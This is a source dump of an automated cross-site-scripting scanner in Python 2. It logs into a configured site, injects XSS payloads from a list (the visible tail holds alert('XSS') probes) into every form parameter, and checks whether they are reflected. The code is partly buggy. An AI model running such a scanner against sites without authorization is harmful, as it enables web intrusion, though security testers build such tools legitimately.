| 16 | "> 
17 | "> 
18 | "> 
19 | "> 
20 | ';alert('XSS');//
--------------------------------------------------------------------------------
/xss_finder /src/post_xss.py:
--------------------------------------------------------------------------------
  1 | __author__ = 'mohd.siddiqui'
  2 | #!/usr/bin/env python
  3 | 
  4 | 
  5 | # Imports
  6 | import sys, re, urllib2, json, time, cookielib, urllib
  7 | from datetime import datetime
  8 | from copy import deepcopy
  9 | from threadpool import *
 10 | from cfghlp import ConfigHelper
 11 | 
 12 | # Config
 13 | CONFIG_FILE = 'xss.cfg'
 14 | config = None
 15 | intt=0
 16 | # Vars
 17 | protocol_secure = 'https://'
 18 | protocol_nonsecure = 'http://'
 19 | #XSS_RESPONSE="alert('XSS')"
 20 | 
 21 | # -------------------------------------
 22 | def debug(message):
 23 | # -------------------------------------
 24 | 
 25 |     if config.get('display', 'debug').lower() == 'true':
 26 |         print message
 27 | 
 28 | # -------------------------------------
 29 | def jsonPrint(json_dict):
 30 | # -------------------------------------
 31 | 
 32 |     if config.get('display', 'json_pretty_print').lower() == 'true':
 33 |         print json.dumps(json_dict, sort_keys=True, indent=4)
 34 |     else:
 35 |         print json.dumps(json_dict, sort_keys=True, indent=4)
 36 | 
 37 | # -------------------------------------
 38 | def submit(opener, submit_dict):
 39 | # -------------------------------------
 40 | 
 41 |     # Init
 42 |     request_mode = None
 43 |     request_url = None
 44 |     request_params = None
 45 |     response_mode = None
 46 |     response_url = None
 47 |     response_params = None
 48 | 
 49 |     if 'request' in submit_dict:
 50 |         request_protocol = None
 51 |         if submit_dict['request'].has_key('use_ssl') and submit_dict['request']['use_ssl'].lower() == 'true':
 52 |             request_protocol = protocol_secure
 53 |         else:
 54 |             request_protocol = protocol_nonsecure
 55 |         request_mode = submit_dict['request']['mode']
 56 |         request_url = request_protocol + config.get('general', 'base_url') + submit_dict['request']['url']
 57 |         request_params = submit_dict['request']['params']
 58 |     if 'response' in submit_dict:
 59 |         response_protocol = None
 60 |         if submit_dict['response'].has_key('use_ssl') and submit_dict['response']['use_ssl'].lower() == 'true':
 61 |             response_protocol = protocol_secure
 62 |         else:
 63 |             response_protocol = protocol_nonsecure
 64 |         response_mode = submit_dict['response']['mode']
 65 |         response_url = response_protocol + config.get('general', 'base_url') + submit_dict['response']['url']
 66 |         response_params = submit_dict['response']['params']
 67 | 
 68 |     return_dict = {}
 69 |     return_dict['request'] = {'url': request_url, 'mode': request_mode, 'params': request_params}
 70 |     if response_url and response_url != request_url:
 71 |         return_dict['request_read'] = {'url': response_url, 'mode': response_mode, 'params': response_params}
 72 |     t_start = time.time()
 73 | 
 74 |     try:
 75 |         # Submit Request
 76 |         [submit_url, submit_params] = buildRequest(request_mode, request_url, request_params)
 77 |         check_url=submit_url+'?'+submit_params
 78 |         #print "\nscript url\n",check_url
 79 |         response = opener.open(check_url)
 80 |         #print response.read()
 81 | 
 82 |         # If Response URL is specified, Submit Response
 83 |         if response_url and response_url != request_url:
 84 |             [submit_url, submit_params] = buildRequest(response_mode, response_url, response_params)
 85 |             response = opener.open(submit_url, submit_params)
 86 |             if response_url != response.geturl():
 87 |                 return_dict['request_read']['redirect_url'] = response.geturl()
 88 | 
 89 |         # Read Response
 90 |         return_dict['response'] = response.readlines()
 91 | 
 92 |     except KeyboardInterrupt:
 93 |         sys.exit(0)
 94 |     except Exception, e:
 95 |         return_dict['exception'] = str(e)
 96 |     finally:
 97 |         t_end = time.time()
 98 |         return_dict['time'] = round((t_end - t_start), 5)
 99 |         return_dict['timestamp'] = datetime.now().isoformat(' ')
100 | 
101 |     return return_dict
102 | 
103 | #--------------------------------------
104 | def buildRequest(mode, url, data):
105 | # -------------------------------------
106 | 
107 |     if mode == 'GET':
108 |         get_url = '%s?' % (url)
109 |         for k, v in data.iteritems():
110 |             get_url += '%s=%s&' % (k, v)
111 |         if get_url[-1] in ['?', '&']:
112 |             get_url = get_url[:-1]
113 |         return [get_url, None]
114 |     elif mode == 'POST':
115 |         return [url, urllib.urlencode(data)]
116 |     else:
117 |         return [None, None]
118 | 
119 | # -------------------------------------
120 | 
121 | # -------------------------------------
122 | def login(openers):
123 | # -------------------------------------
124 | 
125 | 
126 | 
127 |     response_protocol="https://"
128 | 
129 | 
130 |     resp_url=response_protocol + config.get('general','base_url') + config.get('login','formkey_url')
131 |     resp=openers['loggedin'].open(resp_url)
132 | 
133 |     #print "fk_url ",resp_url
134 |     page=resp.read()
135 |     form_key=config.get('general','form_key') #define the form key paramter name within quotes
136 |     __FK = page[page.find(form_key):].split("\"",4)[2] #for finding FK value
137 |     email=config.get('login', 'login_email')
138 |     password=config.get('login', 'login_password')
139 |     opener = openers['loggedin']
140 |     url=response_protocol+config.get('general', 'base_url') + config.get('login', 'login_url')
141 |     login_dict = {'request': {'mode': 'POST', 'url': url, 'use_ssl': 'true',
142 |                               'params': {form_key: __FK,
143 |                                          'email':email,
144 |                                          'password': password}}}
145 |     request_mode = login_dict['request']['mode']
146 |     request_url =  login_dict['request']['url']
147 |     request_params = login_dict['request']['params']
148 |     return_dict = {}
149 |     return_dict['request'] = {'url': request_url, 'mode': request_mode, 'params': request_params}
150 |     [submit_url, submit_params] = buildRequest(request_mode, request_url, request_params)
151 |     #print submit_params
152 |     response = opener.open(submit_url,submit_params)
153 |     return_dict['response'] = response.readlines()
154 |     #print return_dict['response']
155 |     submit_response=return_dict
156 |     submit_response['response'] = json.loads(submit_response['response'][0])
157 |     if submit_response['response']['status'].lower() != 'ok':
158 |         jsonPrint(submit_response)
159 |         sys.exit(0)
160 |     else:
161 |         print "\nYou are now logged in \n"
162 | 
163 | 
164 | # -------------------------------------
165 | def attack(site_dict, good_dict ,openers):
166 | # -------------------------------------
167 | 
168 |     vulnerability_dict={}
169 | 
170 |     #vulnerability_dict=deepcopy(site_dict)
171 |     vulnerability_dict['vulnerability'] = []
172 |     opener = openers['loggedin']
173 |     [g_submit_url, g_submit_params] = buildRequest(good_dict['request']['mode'],good_dict['request']['post_url'],good_dict['request']['params'])
174 |     opener.open(g_submit_url,g_submit_params)
175 |     request_mode = site_dict['request']['mode']
176 |     request_url =  site_dict['request']['post_url']
177 |     request_params = site_dict['request']['params']
178 |     #vulnerability_dict['url']=site_dict['response']['url']
179 |     vulnerability_dict['params']=request_params
180 |     return_dict = {}
181 |     return_dict['request'] = {'post_url': request_url, 'mode': request_mode, 'params': request_params}
182 |     [submit_url, submit_params] = buildRequest(request_mode, request_url, request_params)
183 |     response = opener.open(submit_url,submit_params)
184 |     opener.open(g_submit_url,g_submit_params)
185 |     #print response.read()
186 |     return_dict['response'] = response.readlines()
187 |     #print "attcked url",submit_url+'?'+submit_params
188 |     response=opener.open(site_dict['response']['url'])
189 |     #good_url=buildRequest(
190 |     #jsonPrint(site_dict)
191 |     #print "----------opening response url------------"
192 |     attack=response.read()
193 |     #print attack
194 |     XSS=site_dict['response']['xss_response']
195 |     #print "\n\nPayload being used is :",XSS
196 | 
197 |     buf=3
198 |     xs=len(XSS)
199 |     #print "good_dict['response']['xss_response']",good_dict['response']['xss_response']
200 |     XSS_RESPONSE=site_dict['response']['xss_response']
201 | 
202 |     #print XSS_RESPONSE
203 | #    file = open("test.txt","a")
204 | #    file.write(attack);
205 | #    file.close()
206 |     index = attack.find(XSS_RESPONSE)
207 |     buffer = 20
208 |     attack = attack.split("\n");
209 |     #print len(attack)
210 |     #print "\nindex", index
211 |     #print "\nurl->\n",url
212 |     #print "len(vulnerability_dict['vulnerability'])",len(vulnerability_dict['vulnerability'])
213 |     if index != -1:
214 |         vulnerability_dict['vulnerability'] = True
215 | #    else:
216 | #        print str(index) + "not vulnerable"
217 |     #output={}
218 |     #output['param']
219 | 
220 |     #Output
221 |     if config.get('display', 'only_show_vulnerable').lower() == 'false' or vulnerability_dict['vulnerability'] ==True or index != -1:
222 | 
223 |         print "\n===================================================================================="
224 |         print "Vulnerability found (Please check the parameters below)  :"
225 |         jsonPrint(vulnerability_dict)
226 |         intt=1
227 |         print "\n\nPayload being used is :",XSS
228 |         #print "\n\nPage is being searched for this much xss string :",XSS_RESPONSE
229 |         print "\n===================================================================================="
230 | 
231 |     else:
232 |         print "...."
233 | 
234 | 
235 | 
236 | # -------------------------------------
237 | def attackSequence(sites, payloads, openers):
238 | # -------------------------------------
239 | 
240 |     # Init
241 |     threadpool = ThreadPool(int(config.get('general', 'max_thread_count')))
242 |     opener=openers['loggedin']
243 |     i=0
244 |     for site in sites:
245 |         site_dict = json.loads(site)
246 |         #print "\n-------->",site_dict
247 |         fk_url=site_dict['request']['fk_url']      #not response url instead fkurl changes need to be made
248 |         #print "\nfk_url-->",fk_url
249 |         resp=opener.open(fk_url)
250 |         page=resp.read()
251 |         form_key=config.get('general','form_key')
252 |         __FK = page[page.find(form_key):].split("\"",4)[2] #for finding FormKey value
253 | 
254 |         print "\nWorking...."
255 |         #print len(payloads)
256 |         good_dict=deepcopy(site_dict)
257 | 
258 |         for payload in payloads:
259 |             # Loop through parameters
260 | 
261 |             #print payload
262 |             for param_k in sorted(site_dict['request']['params'].iterkeys()):
263 |                 #print param_k
264 |                 attack_dict = deepcopy(site_dict)
265 |                 attack_dict['response']['xss_response']=payload
266 |                 attack_dict['request']['params'][form_key] =__FK
267 |                 #print "\n ------------->",attack_dict
268 |                 attack_dict['request']['params'][param_k] = payload
269 | #                print i
270 | #                i+=1
271 |                 #jsonPrint(attack_dict)
272 |                 #print attack_dict['response']['xss_response']
273 |                 threadpool.enqueue(attack, attack_dict,good_dict, openers)
274 |         #print "sites -------->\n",sites
275 | 
276 |     # Wait for threadpool
277 |     threadpool.wait()
278 | 
279 | # -------------------------------------
280 | if __name__ == '__main__':
281 | # -------------------------------------
282 | 
283 |     # Parse Config
284 |     config = ConfigHelper(CONFIG_FILE, False)
285 | 
286 |     # Init
287 |     debug('Initializing script ...')
288 |     t_global_start = time.time()
289 | 
290 |     # Load SITES and PAYLOADS files
291 |     sites = []
292 |     sites_file = open(config.get('files', 'sites_file'))
293 |     for site in sites_file:
294 |         site = site[:-1].strip()
295 |         if site[0] != '#':
296 |             sites.append(site)
297 | 
298 |     payloads = []
299 |     payloads_file = open(config.get('files', 'payloads_file'))
300 | #    for payload in payloads_file:
301 | #        payload = payload[:-1].strip()
302 | #        if payload[0] != '#':
303 | #            payloads.append(payload[:-1])
304 | 
305 |     for payload in payloads_file:
306 |        payloads.append(payload[:-1])
307 | 
308 | 
309 |     # Create Openers
310 |     openers = dict()
311 | #    print "\nYou are being logged into \"%s\" ,testing can only be performed on this domain\n" % config.get('general','base_url')
312 | #    input=str(raw_input("\nAre you sure you want to continue ? Y/N\t"))
313 |     #if input=='Y' or input =='y':
314 | 
315 |     debug('Creating guest session ...')
316 |     openers['guest'] = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
317 |     debug('Creating logged in session ...')
318 |     openers['loggedin'] = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
319 | 
320 | 
321 |     login(openers)
322 |     #take_input()
323 | 
324 | 
325 |     # Loop through SITES file
326 |     debug('\nStarting attack sequence ...')
327 |     attackSequence(sites, payloads, openers)
328 | 
329 | 
330 |     # Exit
331 |     t_global_end = time.time()
332 |     if (intt=='0'):
333 |         print "\nNo Vulnerabilities found\n"
334 |     debug('Time taken : %.2f seconds' % (t_global_end - t_global_start))
335 | 
--------------------------------------------------------------------------------
/xss_finder /src/sites:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/shadsidd/Automated-XSS-Finder/981b87e47dee9775d6aafb70d23fb7fb1a6dbe97/xss_finder /src/sites
--------------------------------------------------------------------------------
/xss_finder /src/test_old_url.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | filename="sites";
 3 | 
 4 | size=$(ls -l $filename | awk '{ print $5 }')
 5 | #echo $size
 6 | if [ $size -eq '0' ]
 7 |     then
 8 |         echo 'Running the configuration file  as there is no URL  to test '
 9 |         python cli_param.py
10 | fi
11 | python post_xss.py
--------------------------------------------------------------------------------
/xss_finder /src/threadpool.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | from Queue import Queue
 4 | from threading import Thread
 5 | 
 6 | # -------------------------------------
 7 | class ThreadPoolWorker(Thread):
 8 | # -------------------------------------
 9 | 
10 | 	tasks_queue = None
11 | 
12 | 	# -------------------------------------
13 | 	def __init__(self, tasks_queue):
14 | 	# -------------------------------------
15 | 
16 | 		# Init
17 | 		Thread.__init__(self)
18 | 
19 | 		self.tasks_queue = tasks_queue
20 | 
21 | 		# Start daemon thread
22 | 		self.daemon = True
23 | 		self.start()
24 | 
25 | 	# -------------------------------------
26 | 	def __del__(self):
27 | 	# -------------------------------------	
28 | 
29 | 		pass
30 | 
31 | 	# -------------------------------------
32 | 	def run(self):
33 | 	# -------------------------------------
34 | 
35 | 		# Endless loop
36 | 		while True:
37 | 			# Fetch item from queue
38 | 			func, args, kargs = self.tasks_queue.get()
39 | 
40 | 			# Execute task
41 | 			#func(*args, **kargs)
42 | 			try:
43 | 				func(*args, **kargs)
44 | 			except Exception, e:
45 | 				print 'Args',func, args, kargs
46 | 				print 'Exception',e
47 | 
48 | 			# Mark task as completed (remove from queue)
49 | 			self.tasks_queue.task_done()
50 | 
51 | # -------------------------------------
52 | class ThreadPool:
53 | # -------------------------------------
54 | 
55 | 	num_threads = None
56 | 	tasks_queue = None
57 | 
58 | 	DEFAULT_NUM_THREADS = 5
59 | 
60 | 	# -------------------------------------
61 | 	def __init__(self, num_threads=DEFAULT_NUM_THREADS):
62 | 	# -------------------------------------
63 | 
64 | 		# Init
65 | 		self.num_threads = num_threads
66 | 		self.tasks_queue = Queue(num_threads)
67 | 
68 | 		# Create 'num_threads' worker threads
69 | 		for i in range(num_threads):
70 | 			ThreadPoolWorker(self.tasks_queue)
71 | 
72 | 	# -------------------------------------
73 | 	def enqueue(self, func, *args, **kargs):
74 | 	# -------------------------------------
75 | 
76 | 		# Add a task to the queue
77 | 		self.tasks_queue.put((func, args, kargs))
78 | 
79 | 	# -------------------------------------
80 | 	def wait(self):
81 | 	# -------------------------------------
82 | 
83 | 		# Wait for completion of all the tasks in the queue
84 | 		self.tasks_queue.join()
85 | 
86 | # -------------------------------------
87 | if __name__ == '__main__':
88 | # -------------------------------------
89 | 
90 | 	print 'Error : This python script cannot be run as a standalone program.'
91 | 
--------------------------------------------------------------------------------
/xss_finder /src/xss.cfg:
--------------------------------------------------------------------------------
 1 | [general]
 2 | base_url=site.com
 3 | expected_xss_responses=__XSS__,##XSS##
 4 | form_key=
 5 | max_thread_count=1
 6 | 
 7 | [files]
 8 | sites_file=sites
 9 | get_sites_file=get_sites
10 | payloads_file=payloads
11 | 
12 | [login]
13 | login_email=zx@zx.com
14 | login_password=zx
15 | login_url=/account/a_login
16 | formkey_url=/account/login
17 | 
18 | [display]
19 | debug=true
20 | json_pretty_print=true
21 | only_show_vulnerable=true
22 | 
--------------------------------------------------------------------------------
/xss_finder /src/xss.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | 
  3 | 
  4 | # Imports
  5 | import sys, re, urllib2, json, time, cookielib, urllib
  6 | from datetime import datetime
  7 | from copy import deepcopy
  8 | from threadpool import *
  9 | from cfghlp import ConfigHelper
 10 | 
 11 | # Config
 12 | CONFIG_FILE = 'xss.cfg'
 13 | config = None
 14 | intt=0
 15 | # Vars
 16 | protocol_secure = 'https://'
 17 | protocol_nonsecure = 'http://'
 18 | 
 19 | # -------------------------------------
 20 | def debug(message):
 21 | # -------------------------------------
 22 | 
 23 |     if config.get('display', 'debug').lower() == 'true':
 24 |         print message
 25 | 
 26 | # -------------------------------------
 27 | def jsonPrint(json_dict):
 28 | # -------------------------------------
 29 | 
 30 |     if config.get('display', 'json_pretty_print').lower() == 'true':
 31 |         print json.dumps(json_dict, sort_keys=True, indent=4)
 32 |     else:
 33 |         print json.dumps(json_dict, sort_keys=True)
 34 | 
 35 | # -------------------------------------
 36 | def submit(opener, submit_dict):
 37 | # -------------------------------------
 38 | 
 39 |     # Init
 40 |     request_mode = None
 41 |     request_url = None
 42 |     request_params = None
 43 |     response_mode = None
 44 |     response_url = None
 45 |     response_params = None
 46 | 
 47 |     if 'request' in submit_dict:
 48 |         request_protocol = None
 49 |         if submit_dict['request'].has_key('use_ssl') and submit_dict['request']['use_ssl'].lower() == 'true':
 50 |             request_protocol = protocol_secure
 51 |         else:
 52 |             request_protocol = protocol_nonsecure
 53 |         request_mode = submit_dict['request']['mode']
 54 |         request_url = request_protocol + config.get('general', 'base_url') + submit_dict['request']['url']
 55 |         request_params = submit_dict['request']['params']
 56 |     if 'response' in submit_dict:
 57 |         response_protocol = None
 58 |         if submit_dict['response'].has_key('use_ssl') and submit_dict['response']['use_ssl'].lower() == 'true':
 59 |             response_protocol = protocol_secure
 60 |         else:
 61 |             response_protocol = protocol_nonsecure
 62 |         response_mode = submit_dict['response']['mode']
 63 |         response_url = response_protocol + config.get('general', 'base_url') + submit_dict['response']['url']
 64 |         response_params = submit_dict['response']['params']
 65 | 
 66 |     return_dict = {}
 67 |     return_dict['request'] = {'url': request_url, 'mode': request_mode, 'params': request_params}
 68 |     if response_url and response_url != request_url:
 69 |         return_dict['request_read'] = {'url': response_url, 'mode': response_mode, 'params': response_params}
 70 |     t_start = time.time()
 71 | 
 72 |     try:
 73 |         # Submit Request
 74 |         [submit_url, submit_params] = buildRequest(request_mode, request_url, request_params)
 75 |         check_url=submit_url+'?'+submit_params
 76 |         #print "\nscript url\n",check_url
 77 |         response = opener.open(check_url)
 78 |         #print response.read()
 79 | 
 80 |         # If Response URL is specified, Submit Response
 81 |         if response_url and response_url != request_url:
 82 |             [submit_url, submit_params] = buildRequest(response_mode, response_url, response_params)
 83 |             response = opener.open(submit_url, submit_params)
 84 |             if response_url != response.geturl():
 85 |                 return_dict['request_read']['redirect_url'] = response.geturl()
 86 | 
 87 |         # Read Response
 88 |         return_dict['response'] = response.readlines()
 89 | 
 90 |     except KeyboardInterrupt:
 91 |         sys.exit(0)
 92 |     except Exception, e:
 93 |         return_dict['exception'] = str(e)
 94 |     finally:
 95 |         t_end = time.time()
 96 |         return_dict['time'] = round((t_end - t_start), 5)
 97 |         return_dict['timestamp'] = datetime.now().isoformat(' ')
 98 | 
 99 |     return return_dict
100 | 
101 | #--------------------------------------
102 | def buildRequest(mode, url, data):
103 | # -------------------------------------
104 | 
105 |     if mode == 'GET':
106 |         get_url = '%s?' % (url)
107 |         for k, v in data.iteritems():
108 |             get_url += '%s=%s&' % (k, v)
109 |         if get_url[-1] in ['?', '&']:
110 |             get_url = get_url[:-1]
111 |         return [get_url, None]
112 |     elif mode == 'POST':
113 |         return [url, urllib.urlencode(data)]
114 |     else:
115 |         return [None, None]
116 | 
117 | # -------------------------------------
118 | 
119 | # -------------------------------------
120 | def login(openers):
121 | # -------------------------------------
122 | 
123 | 
124 | 
125 |     response_protocol="http://"
126 | 
127 | 
128 |     resp_url=response_protocol + config.get('general','base_url') + config.get('login','fk_url')
129 |     resp=openers['loggedin'].open(resp_url)
130 | 
131 |     #print "fk_url ",resp_url
132 |     page=resp.read()
133 |     __FK = page[page.find("__FK"):].split("\"",4)[2] #for finding FK value
134 |     email=config.get('login', 'login_email')
135 |     password=config.get('login', 'login_password')
136 |     opener = openers['loggedin']
137 |     url=response_protocol+config.get('general', 'base_url') + config.get('login', 'login_url')
138 |     login_dict = {'request': {'mode': 'POST', 'url': url, 'use_ssl': 'false',
139 |                               'params': {'__FK': __FK,
140 |                                          'email':email,
141 |                                          'password': password}}}
142 |     request_mode = login_dict['request']['mode']
143 |     request_url =  login_dict['request']['url']
144 |     request_params = login_dict['request']['params']
145 |     return_dict = {}
146 |     return_dict['request'] = {'url': request_url, 'mode': request_mode, 'params': request_params}
147 |     [submit_url, submit_params] = buildRequest(request_mode, request_url, request_params)
148 |     response = opener.open(submit_url,submit_params)
149 |     return_dict['response'] = response.readlines()
150 |     submit_response=return_dict
151 |     submit_response['response'] = json.loads(submit_response['response'][0])
152 |     if submit_response['response']['status'].lower() != 'ok':
153 |         jsonPrint(submit_response)
154 |         sys.exit(0)
155 |     else:
156 |         print "\nYou are now logged in \n"
157 | 
158 | # -------------------------------------
159 | def attack(site_dict, openers):
160 | # -------------------------------------
161 | 
162 | 
163 |     opener = openers['loggedin']
164 |     # Submit request and get response
165 |     submit_response = submit(opener, site_dict)
166 |     #print "\nsubmit_response\n",submit_response
167 |     # Select response (in sites or default)
168 |     expected_xss_responses = "alert('XSS')"
169 |     #print "expected_xss_responses",expected_xss_responses
170 |     # Build vulnerability dict
171 |     #vulnerability_dict = deepcopy(submit_response)
172 |     #print "\nvulnerability_dic",vulnerability_dic
173 |     vulnerability_dict['expected_xss_responses'] = expected_xss_responses
174 |     vulnerability_dict['vulnerability'] = []
175 |     #print "vulnerability_dict['response']",vulnerability_dict
176 |     # Loop through response and search for vulnerabilities
177 |     if vulnerability_dict.has_key('response'):
178 |         a=1
179 |     print "a=====",a
180 |     if vulnerability_dict.has_key('response'):
181 |         del(vulnerability_dict['response'])
182 |         #print "submit_response['response']---",submit_response['response']
183 |         for line_number, line in enumerate(submit_response['response']):
184 |             for expected_xss_response in expected_xss_responses:
185 |                 if re.search(expected_xss_response.upper(), line.upper()):
186 |                     vulnerability_dict['vulnerability'].append({'line_number': line_number, 'line': line.strip()})
187 | 
188 |     # Output
189 |     if config.get('display', 'only_show_vulnerable').lower() == 'false' or len(vulnerability_dict['vulnerability']) > 0:
190 |         jsonPrint(vulnerability_dict)
191 |         intt=1
192 |     else:
193 |         print "...."
194 | 
195 | 
196 | 
197 | # -------------------------------------
198 | def attackSequence(sites, payloads, openers):
199 | # -------------------------------------
200 | 
201 |     # Init
202 |     threadpool = ThreadPool(int(config.get('general', 'max_thread_count')))
203 |     opener=openers['loggedin']
204 | 
205 |     for site in sites:
206 |         site_dict = json.loads(site)
207 |         #print "\n-------->",site_dict
208 |         fk_url=site_dict['request']['fk_url']      #not response url instead fkurl changes need to be made
209 |         #print "\nfk_url-->",fk_url
210 |         resp=opener.open(fk_url)
211 |         page=resp.read()
212 |         __FK = page[page.find("__FK"):].split("\"",4)[2] #for finding FK value
213 |         #print __FK
214 |         __FK = urllib.quote_plus(__FK)
215 |         #print "\n__FK   ",__FK
216 |         print "\nWorking...."
217 |         for payload in payloads:
218 |             for param_k in sorted(site_dict['request']['params'].iterkeys()):
219 |                 attack_dict = deepcopy(site_dict)
220 |                 attack_dict['request']['params']['__FK'] =__FK
221 |                 #print "\n ------------->",attack_dict
222 | 
223 |                 attack_dict['request']['params'][param_k] = payload
224 |                 threadpool.enqueue(attack, attack_dict, openers)
225 |         #print "sites -------->\n",sites
226 | 
227 |     # Wait for threadpool
228 |     threadpool.wait()
229 | 
230 | # -------------------------------------
231 | if __name__ == '__main__':
232 | # -------------------------------------
233 | 
234 |     # Parse Config
235 |     config = ConfigHelper(CONFIG_FILE, False)
236 | 
237 |     # Init
238 |     debug('Initializing script ...')
239 |     t_global_start = time.time()
240 | 
241 |     # Load SITES and PAYLOADS files
242 |     sites = []
243 |     sites_file = open(config.get('files', 'sites_file'))
244 |     for site in sites_file:
245 |         site = site[:-1].strip()
246 |         if site[0] != '#':
247 |             sites.append(site)
248 | 
249 |     payloads = []
250 |     payloads_file = open(config.get('files', 'payloads_file'))
251 |     for payload in payloads_file:
252 |         payload = payload[:-1].strip()
253 |         if payload[0] != '#':
254 |             payloads.append(payload[:-1])
255 | 
256 |     # Create Openers
257 |     openers = dict()
258 |     print "\nYou are being logged into Test.com make sure you enter testbed urls (else changed config file)\n"
259 |     debug('Creating guest session ...')
260 |     openers['guest'] = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
261 |     debug('Creating logged in session ...')
262 |     openers['loggedin'] = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
263 | 
264 | 
265 |     login(openers)
266 |     #take_input()
267 | 
268 | 
269 |     # Loop through SITES file
270 |     debug('\nStarting attack sequence ...')
271 |     attackSequence(sites, payloads, openers)
272 | 
273 | 
274 |     # Exit
275 |     t_global_end = time.time()
276 |     if (intt=='0'):
277 |         print "\nNo Vulnerabilities found\n"
278 |     debug('Time taken : %.2f seconds' % (t_global_end - t_global_start))
--------------------------------------------------------------------------------
/xss_finder /src/xss.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | filename="sites";
 3 |  echo '\n\n What do you want to test ?'
 4 |  echo '\n1. GET urls (URLs were params are in url )\n'
 5 |  echo '2. POST urls ()\n'
 6 |  echo ' Your Choice'
 7 |  read test
 8 | 
 9 |  if [ $test -eq '2' ]
10 |  then
11 |     size=$(ls -l $filename | awk '{ print $5 }')
12 |     #echo $size
13 |     if [ $size -gt '0' ]
14 |         then
15 |             echo '\nThere is already some URL to test in "sites" file \n1.Do you want to test them \n2. Do you want to test a new URL ?\n'
16 |             read input
17 |             if [ $input -eq '1' ]
18 |                 then
19 |                     python check_domain.py
20 |                     a=$?
21 |                      if [ $a -eq '1' ]
22 |                         then
23 |                             python post_xss.py
24 |                     else
25 |                     #python cli_param.py
26 |                         exit 1
27 |                     fi
28 |             elif [ $input -eq '2' ]
29 |                 then
30 |                     #echo 'Do you want to enter parameters in CLI mode or want to edit '
31 |                     echo '\n\nRunning the configuration file  and removing the previous content copying all your previous content to old_sites file'
32 |                     cat sites>>old_sites
33 |                     > sites
34 |                     python cli_param.py
35 |                     #python post_xss.py
36 |                     #exit 1
37 |             else
38 |                 echo '\n Wrong Input'
39 |             fi
40 |     elif [ $size -eq '0' ]
41 |         then
42 |             echo 'Running the configuration file  as there is nothing to test '
43 |             python check_domain.py
44 |             python cli_param.py
45 |             #python test_xss.py
46 |     fi
47 | 
48 |  elif [ $test -eq '1' ]
49 |  then
50 |     python get_xss.py
51 |     exit 1
52 |  else
53 |  echo '\nWrong input re-run the script\n'
54 |  fi
55 |  python post_xss.py
--------------------------------------------------------------------------------
 |